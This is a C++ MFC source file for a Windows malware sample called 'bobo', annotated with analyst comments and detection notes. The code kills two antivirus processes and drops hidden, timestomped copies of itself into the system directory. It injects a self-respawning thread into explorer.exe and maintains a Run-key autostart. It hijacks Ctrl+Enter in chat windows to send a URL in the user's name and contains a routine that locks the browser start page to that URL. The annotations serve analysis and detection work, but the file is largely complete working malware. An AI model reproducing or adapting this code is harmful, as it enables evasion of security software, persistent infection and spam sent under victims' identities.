
// boboDlg.cpp : 实现文件
//

#define UNICODE
#define _UNICODE

#include <windows.h>
#include <tchar.h>
#include <conio.h>
#include <stdio.h>
#include "stdafx.h"
#include "bobo.h"
#include "boboDlg.h"
#include "atlbase.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// Forward declarations for the privilege, injection and watchdog helpers defined later in this file.
void EnableDebugPriv();
HANDLE CreateRemote(PTSTR ctname,PTSTR ckname);
DWORD WINAPI watch(LPVOID pvparam);
// File names that OnInitDialog() and watch() append to the system directory:
// the dropped copy of this executable and its hidden backup copy. The doubled
// forward slashes are how the literals appear in this listing; they look like
// mangled Windows path separators — confirm against the original source.
TCHAR *name1=_T("//bobo.exe");
TCHAR *name2=_T("//kernel.dll");
// URL that PasteText() places on the clipboard and Creg() writes as the IE
// start page. Network indicator for this sample.
TCHAR g_str[] = "http://lovef2.x-8.org/hy/";
// Receives the thread id from CreateRemoteThread() in CreateRemote(); not read anywhere in this listing.
 DWORD byte_write;
// Resolves a process image name to a PID. Declared here; its body is not in this listing.
DWORD GetID(char *szName);
// k: nonzero once the Ctrl+Enter hotkey is registered (see OnTimer/OnHotKey).
// jj: timer tick counter incremented in OnTimer().
int k=0;
int jj=0;
// CAboutDlg dialog used for the application's "About" menu item

// Standard MFC wizard-generated "About" dialog; no custom behaviour.
class CAboutDlg : public CDialog
{
public:
 CAboutDlg();

// Dialog data
 enum { IDD = IDD_ABOUTBOX };

 protected:
 virtual void DoDataExchange(CDataExchange* pDX);    // DDX/DDV support

// Implementation
protected:
 DECLARE_MESSAGE_MAP()
};

// Constructs the About dialog from its resource template (IDD_ABOUTBOX).
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
}

// DDX/DDV hook; no controls are bound, so it only forwards to the base class.
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
 CDialog::DoDataExchange(pDX);
}

// Empty message map: the About dialog handles no messages of its own.
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
END_MESSAGE_MAP()


// CboboDlg dialog

 

// Main dialog constructor: loads the application icon. All of the sample's
// real behaviour starts later, in OnInitDialog() and OnTimer().
CboboDlg::CboboDlg(CWnd* pParent /*=NULL*/)
 : CDialog(CboboDlg::IDD, pParent)
{
 m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}

// DDX/DDV hook; no controls are bound, so it only forwards to the base class.
void CboboDlg::DoDataExchange(CDataExchange* pDX)
{
 CDialog::DoDataExchange(pDX);
}

// Message map. Beyond the wizard defaults, WM_TIMER is routed to OnTimer()
// (periodic AV-process termination and hotkey registration) and WM_HOTKEY to
// OnHotKey() (the Ctrl+Enter interception).
BEGIN_MESSAGE_MAP(CboboDlg, CDialog)
 ON_WM_SYSCOMMAND()
 ON_WM_PAINT()
 ON_WM_QUERYDRAGICON()
 ON_WM_TIMER()
 ON_MESSAGE(WM_HOTKEY,OnHotKey)
 //}}AFX_MSG_MAP
END_MESSAGE_MAP()


// CboboDlg message handlers

// Dialog initialization. Apart from the MFC wizard boilerplate at the end,
// this is the sample's installation routine: it enables SeDebugPrivilege,
// terminates two security-product processes, starts the 30-second timer that
// drives OnTimer(), drops copies of its own executable into the system
// directory (one of them timestomped and hidden), injects a watchdog thread
// into explorer.exe (CreateRemote) and starts a local watcher thread (watch).
// Every file-system failure path returns -1, which is nonzero and therefore
// still "TRUE" to MFC, so the dialog initializes regardless.
// Detection notes for defenders: SeDebugPrivilege enablement, TerminateProcess
// against AV image names, a self-copy into the system directory with
// SetFileTime/SetFileAttributes tampering, and cross-process memory writes
// into explorer.exe are all observable from this one function.
BOOL CboboDlg::OnInitDialog()
{
 CDialog::OnInitDialog();

 // Acquire SeDebugPrivilege so OpenProcess(PROCESS_ALL_ACCESS) succeeds on
 // processes owned by other users.
 EnableDebugPriv();
 HANDLE han11,han22;
 // RavMon.exe / KAVStart.exe: image names associated with antivirus products
 // (Rising / Kingsoft, to be confirmed). GetID() resolves them to PIDs.
 // Neither handle is ever closed.
 han11=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("RavMon.exe"));
 han22=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("KAVStart.exe"));
    if(han11!=NULL)
 {
  ::TerminateProcess(han11,0);
 }
 if(han22!=NULL)
 {
  ::TerminateProcess(han22,0);
 }
  // Timer id 0, 30 000 ms period -> OnTimer() repeats the kill loop and
  // registers the hotkey.
  SetTimer(0,30000,NULL);
 int ret;
   WIN32_FIND_DATA   fdata;
 HANDLE            ffhandle;
 HANDLE            fchandle;
 SYSTEMTIME        stime;
 FILETIME          ftime;
 TCHAR             curname[MAX_PATH];
      TCHAR ctname[MAX_PATH];
   TCHAR ckname[MAX_PATH];
   TCHAR syspath[MAX_PATH];
    // ctname = <system dir> + name1 ("bobo.exe"), ckname = <system dir> + name2
    // ("kernel.dll"). Both are the drop locations; kernel.dll is a backup copy
    // of the same executable, not a DLL.
    GetSystemDirectory(syspath,MAX_PATH);
   _tcscpy(ctname,syspath);
 _tcscat(ctname,name1);
 _tcscpy(ckname,syspath);
 _tcscat(ckname,name2);
    HINSTANCE hhb;
 // GetWindowLong with a NULL window handle fails and returns 0, so hhb is
 // NULL and GetModuleFileName below yields the path of this process's own
 // executable — i.e. curname is the dropper itself.
 hhb=(HINSTANCE)::GetWindowLong(NULL,DWL_USER);

 ::GetModuleFileName(hhb,curname,MAX_PATH);
   // First drop: copy self to <system dir>\bobo.exe if it is not already there
   // (CopyFile with bFailIfExists=TRUE).
   ffhandle=FindFirstFile(ctname,&fdata);
 if(ffhandle==INVALID_HANDLE_VALUE)
 {  
 
   if(!CopyFile(curname,ctname,TRUE))
   {      
    return -1;
   }
 
 }
 else if(!FindClose(ffhandle))
 {
  return -1;
 }
 // Second drop: the backup copy. GetLastError()==2 is ERROR_FILE_NOT_FOUND;
 // any other FindFirstFile failure aborts.
 ffhandle=FindFirstFile(ckname,&fdata);
 if(ffhandle==INVALID_HANDLE_VALUE)
 {
  if(GetLastError()==2)
  {
   if(!CopyFile(curname,ckname,TRUE))
   {
    return -1;
   }


   // Reopen the copy for writing; fchandle is only closed on the success
   // path below, the early returns in between leak it.
   fchandle=CreateFile(ckname,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
            if(fchandle==INVALID_HANDLE_VALUE)
   { 
    return -1;
   }

   // Timestomping: back-date the file to 2002-01-12 01:00 so it does not
   // stand out as recently created. SetFileTime's arguments are
   // (creation, last-access, last-write), so creation and last-write are
   // set and last-access is left untouched.
   memset(&stime,0,sizeof(stime));
   stime.wYear=2002;
   stime.wMonth=1;
   stime.wDay=12;
   stime.wDayOfWeek=5;   
   stime.wHour=1;
   if(!SystemTimeToFileTime(&stime,&ftime))
   {    
    return -1;
   }
   if(!SetFileTime(fchandle,&ftime,NULL,&ftime))
   {  
    return -1;
   }
   // Read-only + hidden + system keeps the backup out of default Explorer
   // views; this attribute combination on a user-dropped .dll in the
   // system directory is itself a useful hunting indicator.
   if(!SetFileAttributes(ckname,
                      FILE_ATTRIBUTE_READONLY |   
          FILE_ATTRIBUTE_HIDDEN   |   
          FILE_ATTRIBUTE_SYSTEM ))
   {       
    return -1;
   }
   CloseHandle(fchandle);
  }
  else
  {
   return -1;
  }
 }
 else if(!FindClose(ffhandle))
 {         
  return -1;
 }

   // Persistence: inject the respawn thread into explorer.exe, then start a
   // local thread that maintains the Run key and re-injects when needed.
   // hthread may be 0 on failure; neither handle is checked or closed here.
   HANDLE hthread,wthread;
  hthread=CreateRemote(ctname,ckname);
  wthread=CreateThread(NULL,0,watch,(LPVOID)hthread,0,NULL);
 // Add the "About..." menu item to the system menu.

 // IDM_ABOUTBOX must be in the system command range.
 ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
 ASSERT(IDM_ABOUTBOX < 0xF000);

 CMenu* pSysMenu = GetSystemMenu(FALSE);
 if (pSysMenu != NULL)
 {
  CString strAboutMenu;
  strAboutMenu.LoadString(IDS_ABOUTBOX);
  if (!strAboutMenu.IsEmpty())
  {
   pSysMenu->AppendMenu(MF_SEPARATOR);
   pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
  }
 }

 // Set the icon for this dialog. The framework does this automatically
 // when the application's main window is not a dialog.
 SetIcon(m_hIcon, TRUE);   // Set big icon
 SetIcon(m_hIcon, FALSE);  // Set small icon

 // TODO: add extra initialization here
 
 return TRUE;  // return TRUE unless you set the focus to a control
}

// Wizard-generated system-menu handler: shows the About box for IDM_ABOUTBOX,
// otherwise defers to CDialog.
void CboboDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
 if ((nID & 0xFFF0) == IDM_ABOUTBOX)
 {
  CAboutDlg dlgAbout;
  dlgAbout.DoModal();
 }
 else
 {
  CDialog::OnSysCommand(nID, lParam);
 }
}

// If you add a minimize button to your dialog, you will need the code below
//  to draw the icon. For MFC applications using the document/view model,
//  this is done automatically by the framework.

// Wizard-generated paint handler: draws the application icon centred in the
// client area when the window is minimized, otherwise default painting.
void CboboDlg::OnPaint()
{
 if (IsIconic())
 {
  CPaintDC dc(this); // device context for painting

  SendMessage(WM_ICONERASEBKGND, reinterpret_cast<WPARAM>(dc.GetSafeHdc()), 0);

  // Center icon in client rectangle
  int cxIcon = GetSystemMetrics(SM_CXICON);
  int cyIcon = GetSystemMetrics(SM_CYICON);
  CRect rect;
  GetClientRect(&rect);
  int x = (rect.Width() - cxIcon + 1) / 2;
  int y = (rect.Height() - cyIcon + 1) / 2;

  // Draw the icon
  dc.DrawIcon(x, y, m_hIcon);
 }
 else
 {
  CDialog::OnPaint();
 }
}
// Message 133 is WM_NCPAINT (0x0085). Hiding the window on its first
// non-client paint means the dialog never becomes visible: the MFC dialog is
// only a host for the timer, hotkey and injection logic. A GUI process that
// hides itself this early is a behavioural indicator in its own right.
LRESULT CboboDlg::DefWindowProc(UINT message, WPARAM wParam, LPARAM lParam)
    {
     if(message==133)
  {
   ShowWindow(SW_HIDE);
  }
 
     return CDialog::DefWindowProc(message, wParam, lParam);
 }
// The system calls this function to obtain the cursor to display while the user drags the minimized window.
// Wizard-generated: returns the dialog icon as the drag cursor.
HCURSOR CboboDlg::OnQueryDragIcon()
{
 return static_cast<HCURSOR>(m_hIcon);
}
// Parameter block copied into explorer.exe alongside ThreadProc. Because the
// injected code cannot use this module's import table, every API it needs is
// passed in as a pre-resolved address (filled by CreateRemote). Only a subset
// of the fields is actually read by ThreadProc; the rest are populated but
// unused in this listing.
typedef struct _RemotePara{//parameter struct
   char pMessageBox[12];            // "hello" text; not used by ThreadProc
   DWORD dwMessageBox;              // MessageBoxA address; not called by ThreadProc
   DWORD       rpoutputdebugstring; // OutputDebugStringW
 DWORD       rpopenprocess;         // OpenProcess
 DWORD       rpwaitforsingleobject; // WaitForSingleObject
 DWORD       rpfindfirstfile;       // FindFirstFileA
 DWORD       rpcopyfile;            // CopyFileA
 DWORD       rpfindclose;           // FindClose
 DWORD       rpwinexec;             // WinExec

 DWORD       rpmousepid;            // PID of the injecting process (GetCurrentProcessId in CreateRemote)
 HANDLE      rpprocesshandle;       // filled by ThreadProc: handle to rpmousepid
 HANDLE      rpfilehandle;          // filled by ThreadProc: FindFirstFile result
 TCHAR       rptname[MAX_PATH];     // <system dir>\bobo.exe (the file to keep alive)
 TCHAR       rpkname[MAX_PATH];     // <system dir>\kernel.dll (backup copy used to restore it)
 char        rpwinexecname[MAX_PATH]; // ANSI copy of rptname; not used by ThreadProc
 WIN32_FIND_DATA rpfdata;           // scratch for FindFirstFile inside the remote thread

 TCHAR       rpoperror[30];         // error strings: written by CreateRemote, not used by ThreadProc
 TCHAR       rpffferror[30];
 TCHAR       rpcferror[30];
 TCHAR       rpfcerror[30];
 TCHAR       rpweerror[30];
 TCHAR       rpstring[30];          // "i am in remote process" — OutputDebugString marker on entry
 TCHAR       rpwfsosignal[30];      // "i am out of remote process" — marker after the wait returns
}RemotePara, *PREMOTEPARAMETER;

// Remote thread
// Body of the thread that CreateRemote() copies into explorer.exe and starts
// with CreateRemoteThread. It reaches every API only through the addresses in
// the RemotePara block, so it must not touch this module's imports or globals.
// Behaviour: emit a debug-string marker, open the injecting process by PID and
// block until it exits, then — if <system dir>\bobo.exe is gone — restore it
// from the kernel.dll backup and relaunch it with WinExec. This is the
// respawn half of the persistence scheme: killing the visible process makes
// explorer.exe bring it back.
// Defender notes: shows up as a thread in explorer.exe whose start address is
// in a private RWX region not backed by any module (see CreateRemote), and as
// the OutputDebugString text "i am in remote process" / "i am out of remote
// process". Note that rptname/rpkname are TCHAR buffers (wide, given the
// UNICODE define at the top of this file) but are handed to the -A entry
// points resolved in CreateRemote; how that behaves on the original build is
// not determinable from this listing.
DWORD __stdcall ThreadProc (LPVOID pvparam)
{
 PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;
   typedef int (__stdcall *MMessageBoxA)(HWND,LPCTSTR,LPCTSTR,DWORD);//define MessageBox function type
   MMessageBoxA myMessageBoxA;
   myMessageBoxA =(MMessageBoxA) erp->dwMessageBox ;//get function entry address (never called below)
   typedef VOID   (__stdcall *EOutputDebugString)(LPCTSTR);
 typedef HANDLE (__stdcall *EOpenProcess)(DWORD, BOOL, DWORD);
 typedef DWORD  (__stdcall *EWaitForSingleObject)(HANDLE, DWORD);
    typedef HANDLE (__stdcall *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
 typedef BOOL   (__stdcall *ECopyFile)(LPCTSTR, LPCTSTR, BOOL);
 typedef BOOL   (__stdcall *EFindClose)(HANDLE);
 typedef UINT   (__stdcall *EWinExec)(LPCSTR, UINT);
 EOutputDebugString   tOutputDebugString;
 EOpenProcess         tOpenProcess;
 EWaitForSingleObject tWaitForSingleObject;
 EFindFirstFile       tFindFirstFile;
 ECopyFile            tCopyFile;
 EFindClose           tFindClose;
 EWinExec             tWinExec;

 // Bind the pre-resolved addresses (no GetProcAddress is available here).
 tOutputDebugString=(EOutputDebugString)erp->rpoutputdebugstring;
 tOpenProcess=(EOpenProcess)erp->rpopenprocess;
 tWaitForSingleObject=(EWaitForSingleObject)erp->rpwaitforsingleobject;
 tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
 tCopyFile=(ECopyFile)erp->rpcopyfile;
 tFindClose=(EFindClose)erp->rpfindclose;
 tWinExec=(EWinExec)erp->rpwinexec;

 tOutputDebugString(erp->rpstring);

 // Wait for the injector (the visible bobo.exe process) to terminate.
 erp->rpprocesshandle=tOpenProcess(PROCESS_ALL_ACCESS,FALSE,erp->rpmousepid);
 if(erp->rpprocesshandle==NULL)
 {
  return -1;
 }
 tWaitForSingleObject(erp->rpprocesshandle,INFINITE);
tOutputDebugString(erp->rpwfsosignal);
 // If the primary copy was deleted, restore it from the hidden backup.
 erp->rpfilehandle=(HANDLE)tFindFirstFile(erp->rptname,&erp->rpfdata);
 if(erp->rpfilehandle==INVALID_HANDLE_VALUE)
 {
  
  if(!tCopyFile(erp->rpkname,erp->rptname,TRUE))
  {
   return -1;
  }
 }
 // FindClose is also reached when rpfilehandle is INVALID_HANDLE_VALUE.
 if(!tFindClose(erp->rpfilehandle))
 {
  return -1;
 }
  
 // Relaunch the primary copy; WinExec returns a value below 32 on failure.
 if((tWinExec(erp->rptname, 0))<32)              
 {
  return -1;
 }
 return 0;
}
// Local watchdog thread started from OnInitDialog(). pvparam is the handle of
// the thread injected into explorer.exe. Once a second it (1) makes sure the
// value "bobo" under HKLM\Software\Microsoft\Windows\CurrentVersion\Run
// (written with the doubled separators shown in this listing) points at
// <system dir>\bobo.exe, recreating it if it has been removed, and (2) if the
// remote thread is no longer STILL_ACTIVE, injects a fresh one. Together with
// ThreadProc this gives two-way self-repair: the Run key survives deletion and
// the explorer.exe thread survives termination.
// Defender notes: a process that re-writes the same Run value every second
// and repeatedly calls CreateRemoteThread into explorer.exe is a high-signal
// pattern; the registry value name "bobo" is a host indicator for this sample.
// The loop only exits on a registry error.
DWORD WINAPI watch(LPVOID pvparam)
{
 HANDLE            wethread=(HANDLE)pvparam;
 DWORD             exitcode;
   
 HKEY              hkey;
 TCHAR             sname[MAX_PATH];
 TCHAR             wtname[MAX_PATH];
 TCHAR             wkname[MAX_PATH];
 TCHAR             lpdata[MAX_PATH]; 
 LPCTSTR           rgspath=_T("Software//Microsoft//Windows//CurrentVersion//Run");
 DWORD             type=REG_SZ;
 DWORD             dwbuflen=MAX_PATH; 
    int               ret;

    // _tprintf in a GUI subsystem process has no console to write to.
    if((ret=GetSystemDirectory(sname,MAX_PATH))==0)
 {
     _tprintf(_T("GetSystemDirectory in watch Error: %d/n"),GetLastError());
     return -1;
 }
    // Same drop paths as OnInitDialog(): primary copy and backup copy.
    _tcscpy(wtname,sname);
    _tcscat(wtname,name1);
 _tcscpy(wkname,sname);
 _tcscat(wkname,name2);

 while(1)
 {  
        ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_QUERY_VALUE,&hkey);
  if(ret!=ERROR_SUCCESS)
  {
   break;
  }
  // Probe for the Run value; dwbuflen is updated in place by this call and
  // then reused as the data size of the RegSetValueEx below, so the length
  // written is whatever the query left there, not the length of wtname.
  ret=RegQueryValueEx(hkey,_T("bobo"),NULL,NULL,(LPBYTE)lpdata,&dwbuflen);
  RegCloseKey(hkey);
  if(ret!=ERROR_SUCCESS)
  {
   // Value missing (or unreadable): recreate the autostart entry.
   ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
   if(ret!=ERROR_SUCCESS)
   {
    break;
   }
   ret=RegSetValueEx(hkey,_T("bobo"),NULL,type,(const byte *)wtname,dwbuflen);
   RegCloseKey(hkey);
   if(ret!=ERROR_SUCCESS)
   {
    break;
   }
  }
 
  // Re-inject into explorer.exe when the previous remote thread has ended.
  // The old handle is overwritten without being closed.
  GetExitCodeThread(wethread,&exitcode);
  if(exitcode!=STILL_ACTIVE)
  {
   wethread=CreateRemote(wtname,wkname);
  }
     Sleep(1000); 
 }
 return 0;
}

// Injects ThreadProc into explorer.exe using the classic
// OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
// sequence. ctname/ckname are the primary and backup drop paths that the
// remote thread will use. Returns the remote thread handle, or 0 on failure.
// Two allocations are made in the target: a 4 KiB PAGE_EXECUTE_READWRITE
// region that receives raw bytes copied from &ThreadProc (THREADSIZE bytes,
// i.e. whatever follows the function in this image is copied too), and a
// PAGE_READWRITE region for the RemotePara block of pre-resolved API
// addresses and strings.
// Defender notes: a private RWX allocation in explorer.exe plus a remote
// thread starting inside it is the canonical injection telemetry
// (Sysmon event 8 / EDR "CreateRemoteThread" rules). None of the process,
// module or thread handles opened here are closed, and the MessageBox calls
// are left-over debugging output. The narrow string literals passed to
// MessageBox/LoadLibrary are inconsistent with the UNICODE define at the top
// of this file; the build configuration of the original is not determinable
// from this listing.
HANDLE CreateRemote(PTSTR ctname,PTSTR ckname)
{
 const DWORD THREADSIZE=1024*4;
   // Target is explorer.exe, located by image name via GetID().
   HANDLE hWnd = ::OpenProcess (PROCESS_ALL_ACCESS,FALSE,::GetID("explorer.exe"));
   if(!hWnd)return 0;
   void *pRemoteThread =::VirtualAllocEx(hWnd,0,THREADSIZE,MEM_COMMIT| MEM_RESERVE,PAGE_EXECUTE_READWRITE);
   if(!pRemoteThread)
   {
    MessageBox(NULL,"1","1",0);
    return 0;
   }
   // Copies THREADSIZE bytes starting at ThreadProc's entry; a failure here is
   // reported but execution continues.
   if(!::WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,THREADSIZE,0))
   {
       MessageBox(NULL,"21","21",0);
   }
   //then assign the parameter block
   RemotePara rp;
   ::ZeroMemory(&rp,sizeof(rp));
   HINSTANCE hUser32 = ::LoadLibrary ("user32.dll");
    HINSTANCE  hkernel32=::LoadLibrary("kernel32.dll");
   { const DWORD THREADSIZE=1024*4;  // shadows the outer constant; unused
    rp.dwMessageBox =(DWORD) ::GetProcAddress (hUser32 , "MessageBoxA");
   strcpy(rp.pMessageBox,"hello/0");
          // The remote thread waits for this process to exit before respawning it.
          rp.rpmousepid=GetCurrentProcessId();
  _tcscpy(rp.rpstring,_T("i am in remote process/n"));
  _tcscpy(rp.rpcferror,_T("CopyFile Error/n"));
  _tcscpy(rp.rpfcerror,_T("FindClose Error/n"));
  _tcscpy(rp.rpffferror,_T("FindFirstFile Error/n"));
  _tcscpy(rp.rpoperror,_T("OpenProcess Error/n"));
  _tcscpy(rp.rpweerror,_T("WinExec Error/n"));
  _tcscpy(rp.rpwfsosignal,_T("i am out of remote process/n"));
        _tcscpy(rp.rptname,ctname);
  _tcscpy(rp.rpkname,ckname); 
  // ANSI copy of the target path; ThreadProc does not read rpwinexecname.
  WideCharToMultiByte(CP_ACP,0,(LPCWSTR)ctname,-1,rp.rpwinexecname,_tcslen(ctname),NULL,NULL);
  // Resolve the API addresses in this process; kernel32/user32 map at the
  // same base in explorer.exe, which is what the remote thread relies on.
  rp.rpoutputdebugstring=(DWORD)GetProcAddress(hkernel32,"OutputDebugStringW");
  rp.rpopenprocess=(DWORD)GetProcAddress(hkernel32,"OpenProcess");
  rp.rpwaitforsingleobject=(DWORD)GetProcAddress(hkernel32,"WaitForSingleObject");
  rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileA");
  rp.rpcopyfile=(DWORD)GetProcAddress(hkernel32,"CopyFileA");
  rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
  rp.rpwinexec=(DWORD)GetProcAddress(hkernel32,"WinExec");
   }
   //write the parameter block into the target process
   RemotePara *pRemotePara =(RemotePara *) ::VirtualAllocEx (hWnd ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);//note the page protection used for this allocation
   if(!pRemotePara)
    return 0;
   if(!::WriteProcessMemory (hWnd,pRemotePara,&rp,sizeof(rp),0))
   {::MessageBox(NULL,"a","b",0);
    return 0;
   }
   //start the remote thread; byte_write receives the thread id (lpThreadId), not a byte count
   HANDLE hThread = ::CreateRemoteThread(hWnd,0,0,(DWORD(__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);
   if(!hThread)
   {
   ::MessageBox(NULL,"a","a",0);
      return 0;
   }
   return hThread;
}
 // Elevate privileges
// Enables SeDebugPrivilege on the current process token, which is what lets
// OpenProcess(PROCESS_ALL_ACCESS) succeed against the AV processes and
// explorer.exe. Failures are silent. The token handle is closed only on the
// LookupPrivilegeValue and AdjustTokenPrivileges failure paths; on success it
// is leaked. Enabling SeDebugPrivilege from a non-debugger GUI process is a
// commonly alerted-on precursor to process tampering and injection.
void EnableDebugPriv( void )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;

if ( ! OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
return;
if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) ){
CloseHandle( hToken );
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Note: AdjustTokenPrivileges returning TRUE does not guarantee the privilege
// was granted; GetLastError() would report ERROR_NOT_ALL_ASSIGNED, which is
// not checked here.
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
CloseHandle( hToken );
}
// Places the sample's URL on the clipboard as CF_TEXT and then synthesizes a
// Ctrl+V (VK_CONTROL = 0x11, 'V' = 0x56) into whatever window currently has
// focus, so the URL is pasted into the user's active input field. Called from
// OnHotKey() when the foreground window looks like a chat window.
// Observations: the local g_str shadows the global of the same name;
// OpenClipboard(NULL) associates the clipboard with no owner window and the
// clipboard API return values are not checked; after a successful
// SetClipboardData the system owns the memory handle, yet GlobalFree is
// still called on it. Clipboard replacement plus SendInput/keybd_event-driven
// paste into another application is the user-facing indicator of this sample.
void PasteText()
{
TCHAR g_str[] = "http://lovef2.x-8.org/hy/";
HGLOBAL hMem;
LPTSTR pStr;
// Allocate memory
hMem = GlobalAlloc(GMEM_SHARE, sizeof(g_str));
pStr = (LPSTR)GlobalLock(hMem);
lstrcpy(pStr, g_str);
GlobalUnlock(hMem);
OpenClipboard(NULL);
EmptyClipboard();
// Set clipboard text
SetClipboardData(CF_TEXT, hMem);
CloseClipboard();
GlobalFree(hMem);
// Ctrl down, V down, V up, Ctrl up, then give the target time to process it.
::keybd_event(0x11,0,0,0);
::keybd_event(0x56,0,0,0);
 ::keybd_event(0x56,0,KEYEVENTF_KEYUP,0);
 ::keybd_event(0x11,0,KEYEVENTF_KEYUP,0);
 Sleep(500);
}
// WM_HOTKEY handler for the global Ctrl+Enter hotkey registered in OnTimer().
// Reads up to 255 characters of the foreground window's title and tests it
// with strpbrk against "聊天中" ("chatting"); strpbrk matches if any byte of
// the title equals any byte of that literal, so this is a character-set
// test rather than a substring match and may fire on unrelated titles.
// On a match it calls PasteText() to inject the URL into the focused input
// before the keystroke is forwarded. In both branches the hotkey is then
// unregistered (k=0 lets OnTimer re-register it on the next tick) and a
// Ctrl+Enter sequence is replayed so the user's intended "send" still goes
// through — the practical effect is that the pasted URL is sent in the
// user's name. Note the third keybd_event call passes KEYEVENTF_KEYUP in the
// scan-code position with dwFlags 0, so it is a second Enter key-down rather
// than a key-up. The (long)szTitle cast assumes a 32-bit build.
LONG  CboboDlg::OnHotKey(WPARAM  wParam,LPARAM  lParam) 
  {     
 char szTitle[256];
 char *c="聊天中";
 char *cc;
 HWND hWnd=::GetForegroundWindow();
    ::SendMessage(hWnd,WM_GETTEXT,255,(long)szTitle);
 cc=::strpbrk(szTitle,c);
  if(cc)
  {
 PasteText();
  ::UnregisterHotKey(GetSafeHwnd(),0);
 k=0;
  ::keybd_event(0x11,0,0,0);
 ::keybd_event(0x0D,0,0,0);
 ::keybd_event(0x0D,KEYEVENTF_KEYUP,0,0);
 ::keybd_event(0x11,0,KEYEVENTF_KEYUP,0);
  }
  else
  {
   ::UnregisterHotKey(GetSafeHwnd(),0);
 k=0;
  ::keybd_event(0x11,0,0,0);
 ::keybd_event(0x0D,0,0,0);
 ::keybd_event(0x0D,KEYEVENTF_KEYUP,0,0);
 ::keybd_event(0x11,0,KEYEVENTF_KEYUP,0);
  }
     return  0; 
  } 
// Registry root and key used by Creg() for the Internet Explorer home-page
// policy. The doubled forward slashes are as they appear in this listing and
// look like mangled backslashes — confirm against the original.
HKEY str0=HKEY_CURRENT_USER;
CString str1="Software//Policies//Microsoft//Internet Explorer//Control Panel";
// Browser hijack: sets the IE "HomePage" policy value under
// HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel to 1
// (the policy that locks the home-page setting in the IE UI), writes the
// sample's URL as "Start Page" under HKCU and HKLM
// \Software\Microsoft\Internet Explorer\Main, and launches iexplore.exe from
// the default Program Files path. CRegKey::Open/Set return codes are ignored.
// Called only from OnTimer(); see the note there about the condition guarding
// the call. The three registry writes and the URL are host indicators.
void Creg()
{
  CRegKey reg;
 reg.Open(str0,str1,KEY_READ|KEY_WRITE);
   reg.SetDWORDValue("HomePage",1);
reg.Close();
reg.Open(str0,"Software//Microsoft//Internet Explorer//Main",KEY_READ|KEY_WRITE);
reg.SetStringValue("Start Page","http://lovef2.x-8.org/hy/",REG_SZ);
reg.Close();
reg.Open(HKEY_LOCAL_MACHINE,"Software//Microsoft//Internet Explorer//Main",KEY_READ|KEY_WRITE);
reg.SetStringValue("Start Page","http://lovef2.x-8.org/hy/",REG_SZ);
reg.Close();
 // Open the hijacked start page immediately (SW_SHOWNORMAL = 1).
 ShellExecute(NULL,"open","C://Program Files//Internet Explorer//iexplore.exe",NULL,NULL,1);
}
// 30-second timer tick (SetTimer in OnInitDialog). Each tick: increments the
// jj counter, repeats the termination of RavMon.exe / KAVStart.exe (handles
// again never closed), and registers a global Ctrl+Enter hotkey
// (MOD_CONTROL, VK_RETURN = 0x0D, id 0) if none is registered — RegisterHotKey
// returns nonzero on success, which is what k stores; OnHotKey resets k to 0
// after each use so the hotkey is re-armed here. A global hotkey on
// Ctrl+Enter that is repeatedly registered/unregistered is a useful
// behavioural indicator for this sample.
// Because jj is incremented before the test and starts at 0, the jj==0
// condition below does not hold on any tick in this listing (barring int
// wrap-around), so the Creg() browser hijack and the nested jj==6 reset are
// not reached from here.
void CboboDlg::OnTimer(UINT nIDEvent)
{
 jj++;
 HANDLE han1,han2;
 han1=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("RavMon.exe"));
 han2=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("KAVStart.exe"));
    if(han1!=NULL)
 {
  ::TerminateProcess(han1,0);
 }
 if(han2!=NULL)
 {
  ::TerminateProcess(han2,0);
 }

 if(k==0)
 {
   k=RegisterHotKey(GetSafeHwnd(),0,MOD_CONTROL,0x0D);
 
 }
 
 if(jj==0)
 {
  Creg();
  if(jj==6)
  {
   jj=0;
  }
 }
}

 
